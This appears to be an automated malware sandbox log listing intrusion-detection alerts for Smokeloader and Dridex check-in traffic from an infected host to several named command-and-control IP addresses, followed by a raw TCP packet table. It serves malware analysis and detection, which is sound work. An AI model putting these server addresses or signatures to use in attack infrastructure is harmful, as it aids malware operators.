2024-10-03T12:27:27.327428+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49736	58.151.148.90	80	TCP
2024-10-03T12:27:30.073115+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49737	58.151.148.90	80	TCP
2024-10-03T12:27:32.842482+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49738	58.151.148.90	80	TCP
2024-10-03T12:27:34.344677+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49739	58.151.148.90	80	TCP
2024-10-03T12:27:37.885580+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49740	58.151.148.90	80	TCP
2024-10-03T12:27:39.642687+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49741	58.151.148.90	80	TCP
2024-10-03T12:27:41.164522+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49742	58.151.148.90	80	TCP
2024-10-03T12:27:42.739696+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49743	58.151.148.90	80	TCP
2024-10-03T12:27:44.297714+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49744	58.151.148.90	80	TCP
2024-10-03T12:27:45.900693+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49745	58.151.148.90	80	TCP
2024-10-03T12:27:47.407549+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49746	58.151.148.90	80	TCP
2024-10-03T12:27:49.220848+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49747	58.151.148.90	80	TCP
2024-10-03T12:27:51.564100+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49748	58.151.148.90	80	TCP
2024-10-03T12:27:54.543734+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49749	58.151.148.90	80	TCP
2024-10-03T12:27:56.427760+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49750	58.151.148.90	80	TCP
2024-10-03T12:27:58.371820+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49752	58.151.148.90	80	TCP
2024-10-03T12:28:00.315752+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49753	58.151.148.90	80	TCP
2024-10-03T12:28:02.012344+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49754	58.151.148.90	80	TCP
2024-10-03T12:28:04.228656+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49755	58.151.148.90	80	TCP
2024-10-03T12:28:05.963555+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49756	58.151.148.90	80	TCP
2024-10-03T12:28:08.026781+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49757	58.151.148.90	80	TCP
2024-10-03T12:28:09.875717+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49758	58.151.148.90	80	TCP
2024-10-03T12:28:12.117152+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49759	58.151.148.90	80	TCP
2024-10-03T12:28:14.089980+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49760	58.151.148.90	80	TCP
2024-10-03T12:28:15.643400+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49761	58.151.148.90	80	TCP
2024-10-03T12:28:18.517348+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49763	58.151.148.90	80	TCP
2024-10-03T12:28:20.067001+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49764	58.151.148.90	80	TCP
2024-10-03T12:28:21.567293+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49765	58.151.148.90	80	TCP
2024-10-03T12:28:42.497186+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49766	23.145.40.162	443	TCP
2024-10-03T12:28:42.784254+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49766	23.145.40.162	443	TCP
2024-10-03T12:28:42.921889+0200	2829848	ETPRO MALWARE SmokeLoader encrypted module (3)	2	23.145.40.162	443	192.168.2.4	49766	TCP
2024-10-03T12:28:43.811450+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49767	23.145.40.162	443	TCP
2024-10-03T12:28:44.091899+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49767	23.145.40.162	443	TCP
2024-10-03T12:28:44.692225+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49768	23.145.40.162	443	TCP
2024-10-03T12:28:44.969641+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49768	23.145.40.162	443	TCP
2024-10-03T12:28:45.771345+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49769	23.145.40.162	443	TCP
2024-10-03T12:28:46.042054+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49769	23.145.40.162	443	TCP
2024-10-03T12:28:46.645029+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49770	23.145.40.162	443	TCP
2024-10-03T12:28:47.014851+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49770	23.145.40.162	443	TCP
2024-10-03T12:28:47.822862+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49771	23.145.40.162	443	TCP
2024-10-03T12:28:48.074813+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49771	23.145.40.162	443	TCP
2024-10-03T12:28:48.682002+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49772	23.145.40.162	443	TCP
2024-10-03T12:28:48.955500+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49772	23.145.40.162	443	TCP
2024-10-03T12:28:49.560507+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49773	23.145.40.162	443	TCP
2024-10-03T12:28:50.644486+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49773	23.145.40.162	443	TCP
2024-10-03T12:28:51.285309+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49774	23.145.40.162	443	TCP
2024-10-03T12:28:51.566750+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49774	23.145.40.162	443	TCP
2024-10-03T12:28:52.192256+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49775	23.145.40.162	443	TCP
2024-10-03T12:28:52.468961+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49775	23.145.40.162	443	TCP
2024-10-03T12:28:53.101813+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49776	23.145.40.162	443	TCP
2024-10-03T12:28:53.374778+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49776	23.145.40.162	443	TCP
2024-10-03T12:28:53.978056+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49777	23.145.40.162	443	TCP
2024-10-03T12:28:54.252203+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49777	23.145.40.162	443	TCP
2024-10-03T12:28:54.876440+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49778	23.145.40.162	443	TCP
2024-10-03T12:28:55.156826+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49778	23.145.40.162	443	TCP
2024-10-03T12:28:55.812885+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49779	23.145.40.162	443	TCP
2024-10-03T12:28:56.094767+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49779	23.145.40.162	443	TCP
2024-10-03T12:28:56.986884+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49780	23.145.40.162	443	TCP
2024-10-03T12:28:57.278366+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49780	23.145.40.162	443	TCP
2024-10-03T12:28:57.965948+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49781	23.145.40.162	443	TCP
2024-10-03T12:28:58.240357+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49781	23.145.40.162	443	TCP
2024-10-03T12:28:58.988741+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49782	23.145.40.162	443	TCP
2024-10-03T12:28:59.309408+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49782	23.145.40.162	443	TCP
2024-10-03T12:29:03.334662+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49783	23.145.40.162	443	TCP
2024-10-03T12:29:31.304807+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49784	58.151.148.90	80	TCP
2024-10-03T12:29:38.126601+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49785	58.151.148.90	80	TCP
2024-10-03T12:29:46.811497+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49786	58.151.148.90	80	TCP
2024-10-03T12:29:58.318141+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49787	58.151.148.90	80	TCP
2024-10-03T12:30:12.095185+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49788	109.175.29.39	80	TCP
2024-10-03T12:30:14.936616+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49789	23.145.40.162	443	TCP
2024-10-03T12:30:15.179534+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49789	23.145.40.162	443	TCP
2024-10-03T12:30:20.786073+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49790	109.175.29.39	80	TCP
2024-10-03T12:30:31.979046+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49791	23.145.40.162	443	TCP
2024-10-03T12:30:32.301417+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49791	23.145.40.162	443	TCP
2024-10-03T12:30:38.459805+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49792	109.175.29.39	80	TCP
2024-10-03T12:30:49.578093+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49793	23.145.40.162	443	TCP
2024-10-03T12:30:49.938730+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49793	23.145.40.162	443	TCP
2024-10-03T12:30:55.626266+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49794	109.175.29.39	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 12:27:25.538295984 CEST	49736	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:25.543447018 CEST	80	49736	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:25.547516108 CEST	49736	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:25.547517061 CEST	49736	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:25.547517061 CEST	49736	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:25.552795887 CEST	80	49736	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:25.552824974 CEST	80	49736	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:27.326905966 CEST	80	49736	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:27.327069998 CEST	80	49736	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:27.327428102 CEST	49736	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:27.329539061 CEST	49736	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:27.332658052 CEST	49737	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:27.334531069 CEST	80	49736	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:27.337642908 CEST	80	49737	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:27.337733984 CEST	49737	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:27.337848902 CEST	49737	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:27.337883949 CEST	49737	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:27.342905045 CEST	80	49737	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:27.342933893 CEST	80	49737	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:30.072880030 CEST	80	49737	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:30.072943926 CEST	80	49737	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:30.073115110 CEST	49737	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:30.074204922 CEST	49737	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:30.076824903 CEST	49738	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:30.079047918 CEST	80	49737	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:30.081773996 CEST	80	49738	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:30.081927061 CEST	49738	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:30.082432032 CEST	49738	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:30.082432032 CEST	49738	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:30.087423086 CEST	80	49738	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:30.087524891 CEST	80	49738	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:32.842261076 CEST	80	49738	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:32.842302084 CEST	80	49738	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:32.842482090 CEST	49738	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:32.842693090 CEST	49738	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:32.845477104 CEST	49739	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:32.847712994 CEST	80	49738	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:32.850439072 CEST	80	49739	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:32.850533962 CEST	49739	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:32.850625038 CEST	49739	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:32.850650072 CEST	49739	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:32.855690002 CEST	80	49739	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:32.855734110 CEST	80	49739	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:34.344331026 CEST	80	49739	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:34.344595909 CEST	80	49739	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:34.344676971 CEST	49739	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:34.344772100 CEST	49739	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:34.348241091 CEST	49740	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:34.349709988 CEST	80	49739	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:34.353205919 CEST	80	49740	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:34.353296995 CEST	49740	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:34.353441000 CEST	49740	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:34.353477001 CEST	49740	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:34.358289003 CEST	80	49740	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:34.358371019 CEST	80	49740	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:37.884989977 CEST	80	49740	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:37.885416985 CEST	80	49740	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:37.885580063 CEST	49740	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:37.885858059 CEST	49740	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:37.891659021 CEST	80	49740	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:37.898480892 CEST	49741	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:37.903477907 CEST	80	49741	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:37.903563023 CEST	49741	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:37.903688908 CEST	49741	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:37.903723955 CEST	49741	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:37.908721924 CEST	80	49741	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:37.908838034 CEST	80	49741	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:39.642565966 CEST	80	49741	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:39.642591953 CEST	80	49741	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:39.642687082 CEST	49741	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:39.642874002 CEST	49741	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:39.645420074 CEST	49742	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:39.647831917 CEST	80	49741	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:39.650333881 CEST	80	49742	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:39.650408030 CEST	49742	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:39.650537014 CEST	49742	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:39.650572062 CEST	49742	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:39.655530930 CEST	80	49742	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:39.655627012 CEST	80	49742	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:41.164438963 CEST	80	49742	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:41.164468050 CEST	80	49742	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:41.164521933 CEST	49742	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:41.164707899 CEST	49742	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:41.167588949 CEST	49743	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:41.169514894 CEST	80	49742	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:41.174177885 CEST	80	49743	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:41.174243927 CEST	49743	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:41.174376011 CEST	49743	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:41.174412012 CEST	49743	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:41.180341959 CEST	80	49743	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:41.180356026 CEST	80	49743	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:42.739104986 CEST	80	49743	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:42.739514112 CEST	80	49743	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:42.739696026 CEST	49743	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:42.739696980 CEST	49743	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:42.742846012 CEST	49744	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:42.744704008 CEST	80	49743	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:42.748749971 CEST	80	49744	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:42.748912096 CEST	49744	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:42.748956919 CEST	49744	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:42.748956919 CEST	49744	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:42.753778934 CEST	80	49744	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:42.754079103 CEST	80	49744	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:44.296719074 CEST	80	49744	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:44.297301054 CEST	80	49744	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:44.297713995 CEST	49744	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:44.297713995 CEST	49744	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:44.301688910 CEST	49745	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:44.303137064 CEST	80	49744	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:44.306988001 CEST	80	49745	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:44.307077885 CEST	49745	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:44.307208061 CEST	49745	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:44.307208061 CEST	49745	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:44.312108040 CEST	80	49745	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:44.312139034 CEST	80	49745	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:45.899676085 CEST	80	49745	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:45.900607109 CEST	80	49745	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:45.900692940 CEST	49745	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:45.900780916 CEST	49745	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:45.904067993 CEST	49746	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:45.911469936 CEST	80	49745	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:45.911504984 CEST	80	49746	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:45.911595106 CEST	49746	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:45.911700964 CEST	49746	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:45.911731958 CEST	49746	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:45.916907072 CEST	80	49746	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:45.916935921 CEST	80	49746	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:47.406816006 CEST	80	49746	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:47.407325983 CEST	80	49746	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:47.407548904 CEST	49746	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:47.407550097 CEST	49746	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:47.410206079 CEST	49747	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:47.412731886 CEST	80	49746	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:47.415203094 CEST	80	49747	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:47.415288925 CEST	49747	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:47.415420055 CEST	49747	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:47.415435076 CEST	49747	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:47.420747995 CEST	80	49747	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:47.420850039 CEST	80	49747	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:49.220580101 CEST	80	49747	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:49.220635891 CEST	80	49747	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:49.220848083 CEST	49747	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:49.220849037 CEST	49747	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:49.223893881 CEST	49748	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:49.225855112 CEST	80	49747	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:49.229032040 CEST	80	49748	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:49.229115963 CEST	49748	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:49.229250908 CEST	49748	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:49.229268074 CEST	49748	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:49.234088898 CEST	80	49748	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:49.234365940 CEST	80	49748	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:51.563879967 CEST	80	49748	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:51.563925028 CEST	80	49748	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:51.564100027 CEST	49748	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:51.567394972 CEST	49748	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:51.567890882 CEST	49749	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:51.572365999 CEST	80	49748	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:51.572791100 CEST	80	49749	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:51.572846889 CEST	49749	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:51.572967052 CEST	49749	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:51.572989941 CEST	49749	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:51.577785015 CEST	80	49749	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:51.578339100 CEST	80	49749	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:54.543570042 CEST	80	49749	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:54.543674946 CEST	80	49749	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:54.543734074 CEST	49749	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:54.543993950 CEST	49749	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:54.548855066 CEST	80	49749	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:54.549148083 CEST	49750	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:54.554529905 CEST	80	49750	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:54.554595947 CEST	49750	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:54.554745913 CEST	49750	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:54.554778099 CEST	49750	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:54.559725046 CEST	80	49750	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:54.559746981 CEST	80	49750	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:56.427618027 CEST	80	49750	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:56.427664995 CEST	80	49750	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:56.427694082 CEST	80	49750	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:56.427759886 CEST	49750	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:56.427994967 CEST	49750	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:56.427994967 CEST	49750	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:56.431024075 CEST	49752	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:56.711549044 CEST	80	49750	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:56.711720943 CEST	49750	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:56.716207981 CEST	80	49750	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:56.716239929 CEST	80	49752	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:56.716348886 CEST	49752	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:56.716701984 CEST	49752	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:56.716741085 CEST	49752	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:56.757499933 CEST	80	49752	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:56.757541895 CEST	80	49752	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:58.367597103 CEST	80	49752	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:58.371625900 CEST	80	49752	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:58.371819973 CEST	49752	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:58.371820927 CEST	49752	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:58.374907017 CEST	49753	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:58.382071018 CEST	80	49752	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:58.383965015 CEST	80	49753	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:58.384061098 CEST	49753	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:58.384233952 CEST	49753	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:27:58.384268999 CEST	49753	80	192.168.2.4	58.151.148.90
